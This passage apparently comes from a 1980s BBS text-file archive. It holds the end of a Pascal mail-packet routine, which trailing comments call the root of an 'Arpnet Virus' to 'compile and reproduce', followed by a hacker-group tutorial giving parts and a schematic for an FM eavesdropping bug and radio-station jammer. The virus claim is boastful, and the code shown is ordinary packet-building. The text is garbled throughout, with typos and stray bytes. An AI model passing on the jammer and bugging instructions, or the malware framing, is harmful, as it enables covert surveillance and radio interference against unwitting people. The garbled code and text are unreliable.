  5123.                REPEAT
  5124.                   IF (mesg.dir_type = message) AND
  5125.                      test_bit(msg_bit + (t3 DIV 1024),t3 MOD 1024) AND
  5126.                      bit(mesg.flags,8) OR bit(mesg.flags,5) THEN
  5127.                      BEGIN
  5128.                         read_for_edit(default.msg_drive + msg_msg_dir,mesg.msg_link,mesg_text);
  5129.                         more := FALSE;
  5130.                         new_net := 0;
  5131.                         new_node := 0;
  5132.                         REPEAT
  5133.                            fwd := FALSE;
  5134.                            get_route_info(mesg.dest_net,mesg.dest_node,
  5135.                                           new_net,new_node,fwd,more);
  5136.                            get_node_info(new_net,new_node,destnode);
  5137.                            i := 1;
  5138.                            seen := FALSE;
  5139.                            REPEAT
  5140.                               IF POS('Message ID:',mesg_text[i]) > 0 THEN
  5141.                                  seen := TRUE;
  5142.                               IF (POS(' ' + destnode.serial_num,mesg_text[i]) > 0)
  5143.                                  AND seen THEN
  5144.                                  i := 0
  5145.                               ELSE
  5146.                                  INC(i)
  5147.                            UNTIL (i = 0) OR (POS(#$FF,mesg_text[i]) > 0);
  5148.                            IF (i <> 0) AND ((NOT bit(mesg.flags,5) AND fwd) AND
  5149.                               bit(mesg.flags,8)) AND
  5150.                               NOT ((new_net = 0) AND (new_node = 0)) THEN
  5151.                               BEGIN
  5152.                                  writest('Packet to Net/Node: ',2,4);
  5153.                                  WRITE(new_net,'/',new_node,' ',destnode.serial_num,'   ');
  5154.                                  writest('Title: ' + mesg.title,2,5);
  5155.                                  CLREOL;
  5156.                                  construct_packet(new_net,new_node)
  5157.                               END
  5158.                         UNTIL NOT more;
  5159.                         mesg.flags := mesg.flags OR $0020;
  5160.                         SEEK(mesg_dir,t3);
  5161.                         WRITE(mesg_dir,mesg)
  5162.                      END;
  5163.                   t3 := mesg.sub_dir_link;
  5164.                   SEEK(mesg_dir,t3);
  5165.                   READ(mesg_dir,mesg)
  5166.                UNTIL mesg.dir_link < 0
  5167.             END  ∩7Å3 
  5168. è      END;
  5169.    UNTIL t1 <= 0;
  5170.    GOTOXY(2,4);
  5171.    CLREOL;
  5172.    CLOSE(mesg_dir);
  5173.    ASSIGN(email_dir,default.email_drive + email_file_dir);
  5174.    {$I-} RESET(email_dir); {$I+}
  5175.    IF IOresult <> 0 THEN
  5176.       BEGIN
  5177.          WRITELN(log_file,'I can''t open the email directory!');
  5178.          writest('I can''t open the email directory!',2,4);
  5179.          EXIT
  5180.       END;
  5181. {-------------CAUGHT SO WHAT DO YOU DO...DOESN'T MATTER DOES IT?--------}
  5182.    WHILE NOT EOF(email_dir) DO BEGIN
  5183.       READ(email_dir,email);
  5184.       IF test_bit(email_bit,FILEPOS(email_dir) - 1) AND
  5185.          bit(email.attrib,0) AND NOT bit(email.attrib,5) THEN
  5186.          BEGIN
  5187.             more := FALSE;
  5188.             fwd := TRUE;
  5189.             get_route_info(email.dest_net,email.dest_node,new_net,new_node,fwd,more);
  5190.             get_node_info(new_net,new_node,destnode);
  5191.             IF (new_net <> 0) OR (new_node <> 0) THEN
  5192.                BEGIN
  5193.                   read_for_edit(default.email_drive + email_msg_dir,
  5194.                                 email.msg_link,mesg_text);
  5195.                   writest('Packet to Net/Node: ',2,4);
  5196.                   WRITE(new_net,'/',new_node,' ',destnode.serial_num,'   ');
  5197.                   writest('Name:  ' + email.dest_name,2,5);
  5198.                   CLREOL;
  5199.                   mesg.orig_node := email.org_node;
  5200.                   mesg.orig_net := email.org_net;
  5201.                   mesg.dest_node := email.dest_node;
  5202.                   mesg.dest_net := email.dest_net;
  5203.                   mesg.flags := email.attrib;
  5204.                   mesg.dest_user := email.dest_name;
  5205.                   mesg.org_user := email.org_name;
  5206.                   mesg.title := '|/<Email>\|';
  5207.                   construct_packet(new_net,new_node)
  5208.                END;
  5209.             email.attrib := email.attrib OR $0020;
  5210.             SEEK(email_dir,FILEPOS(email_dir) - 1);
  5211.             WRITE(email_dir,email)
  5212.          END
  5213.    END;
  5214.    CLOSE(email_dir);
  5215.    WRITELN;
  5216.    CLREOL;
  5217. {---------PUNISHMENT I WANT TO KNOW WHERE IT GOES BETTER LEFT OUT------}
  5218.    writest('Packets constructed: ' + strval(msg_counter),7,7);
  5219.    IF paramstr(1) = '' THEN
  5220.       BEGIN
  5221.          writest('Press any key to continue',6,8);
  5222.          hidecursor;  ∩7Å3 
  5223. è         ch := readkey;
  5224.          IF ch = #0 THEN
  5225.             ch := readkey;
  5226.          showcursor
  5227.       END;
  5228.    closewindow(4);
  5229.    WRITELN(log_file,'Done making the packets. Constructed: ',msg_counter)
  5230. END;
  5231. {---RIGHT LOOKS GOOD AND USEFULL  COMPILE AND REPRODUCE AND REPRODUCE----}
  5232. END.
  5233. {Above code: Is a GMPFU@C, Gone Made from UnderGrad @ College -Program 87}
  5234. {->Arpnet Virus:attachments must be modified,take out the write statements for}
  5235. {better effect and code speed, this is the root of the virus without any }
  5236. {destructive tendencies......hehehe}
  5237. {ShadowSpawn cc @wiskiesour@.988, ACTUALLY MY NAME THIS WEEK IS GEORGE BUSH}
  5238. {--------------------------------------------------------------------------}
  5239. {It gets better, wait till election Day!!!!!!!...better close your.........}
  5240.  
  5241.  
  5242.   
  5243. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  5244. %                                                                          %
  5245. %                   <> How to make an FM ieess BUG <>                      %
  5246. %                                                                          %
  5247. %                         By: <-> Johnney Rotten <->                          %
  5248. %                                                                          %
  5249. %         <> A Cryptic Ciminls/Eite Justice Society presentation <>        %
  5250. %                                                                          %
  5251. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  5252.  
  5253. What it is
  5254. ----------
  5255.  
  5256. This handy little device can be used for two purposes. The firt is a M bug,
  5257. hich transmits on the FM frequency, thus making it extremely easy to pick up.
  5258. The seond is aFM statin blocker (which can be really fun if you are pissed
  5259. at someone who just happens t be listeing to th radio. In this case, you 
  5260. can do 1 (or both) of these: A) announce through the ug (on ther station)that Fred (whoever is listening) has just won 1 years supply of orthopedic
  5261. sho pads, or B disconnectthe mike, and let it fry the station.) In this
  5262. file, I will make some incredbly lame schmatics, whic any fool can follow,
  5263. (lets see you make good schematics with Apple Writer, and tell yo all the
  5264. junkyou need (duh..) Ok, if you have no electronics background at all, go
  5265. ahad and try it nyways (hell, t's not my money your wasting on parts)
  5266.    
  5267.  
  5268. Required Parts
  5269. -------------
  5270.  
  5271. (1) 2n3904transistor...........................[Q1]
  5272. (1) 10k resistor (+-5%).........................[R1]
  5273. (1) .7k resistor (+-%).........................[R2]
  5274. (1) 1k resistor (+-5%)..........................[R3
  5275. (1) .001 uf capaitor............................[C1]
  5276. (1) 5 to 80 pf variable capcitor...............[C2]
  5277. (1) 10 pf cpacitor..............................[C3]
  5278. (2) .5 uh coils................................[L1,L2]
  5279. (1)SpSt slide switch............................[S1]
  5280. (1) 9 voltbattery clip.........................[B1
  5281. (1) Antenna or antenna wire (3 in. or more)......[A1]
  5282. (1)microphone (like one ut of a phone)........[M1]
  5283.  
  5284.  
  5285. Schematics
  5286. ----------
  5287.  
  5288.  
  5289.           ---------------------------*------------*-------------*
  5290.          |             |             |             |            |
  5291.           |            |            |             |             |   +A1
  5292.           |            |             |            |             1  |
  5293.           S1            R1            |            C2            |   |          |             |            |             |             *----
  5294.          |             |            |             |            |
  5295.           +             |            |             |            L2
  5296.           B1           |             |             |             |
  5297.           -             |            C1            |            |
  5298.           |             |            |             |            |
  5299.           |            *-------------*------Q1/-----*-----------*
  5300.           |             |                     \                 |
  5301.   --------*             |                      \________________C3
  5302. mike                                                            |
  5303.   --------*             |                                       |
  5304.           |             R2                                      R3
  5305.           |             |                                       |
  5306.           |             |                                       |
  5307.           -------------------------------------------------------
  5308.  
  5309.  
  5310. How to operate
  5311. -------------
  5312.  
  5313. 1. Turn on (duh..)
  5314.  
  5315. 2. urn the variable capacitor until youare on the station that you want to  use (preferably towards ether end, so if they turn on their raio, they
  5316. don't get a bunch of audio fedback when they hit you station)
  5317.  
  5318. 3. This bug does not have along range (50 ft max), but if you usea large 
  5319. antenna on yor stereo (like the rooftop kind) the rage is greatly increased.
  5320. I prefer to us a AM/FM walkman, soI can get close to the bug, and tape wha
  5321. I want.
  5322.  
  5323.  
  5324. -----------------------------------------------------------------------------
  5325. (C) Januar 1, 1986 Cryptic Criminals/Elite Justice ociety |Thanks: r. Deth
  5326. -----------------------------------------------------------------------------
  5327.  
  5328. Call these ool boards:
  5329.  
  5330. Castle Asgard.........[10 meg BS/AE/FUR].......(818) 788-3594
  5331. Remote Hideut........[2 meg BBS/AE/FUR].......(818) 709-1079
  5332. Treasue Island.......[2 drv AE/PW: RUSH].......(41) 547-2805
  5333.  
  5334. X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
  5335.  
  5336.  Another file downloaded from:                               NIRVANAnet(tm)
  5337.  
  5338.  & the Temple of the Screaming Electron   Jeff Hunter          510-935-5845
  5339.  The Salted Slug                          Strange              408-454-9368
  5340.  Burn This Flag                           Zardoz               408-363-9766
  5341.  realitycheck                             Poindexter Fortran   510-527-1662
  5342.  Lies Unlimited                           Mick Freen           415-583-4102
  5343.  Tomorrow's 0rder of Magnitude            Finger_Man           415-961-9315
  5344.  My Dog Bit Jesus                         Suzanne D'Fault      510-658-8078
  5345.  New Dork Sublime                         Demented Pimiento    415-566-0126
  5346.  
  5347.    Specializing in conversations, obscure information, high explosives,
  5348.         arcane knowledge, political extremism, diverse sexuality,
  5349.        insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.
  5350.  
  5351.   Full access for first-time callers.  We don't want to know who you are,
  5352.    where you live, or what your phone number is. We are not Big Brother.
  5353.  
  5354.                           "Raw Data for Raw Nerves"
  5355.  
  5356. X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
  5357.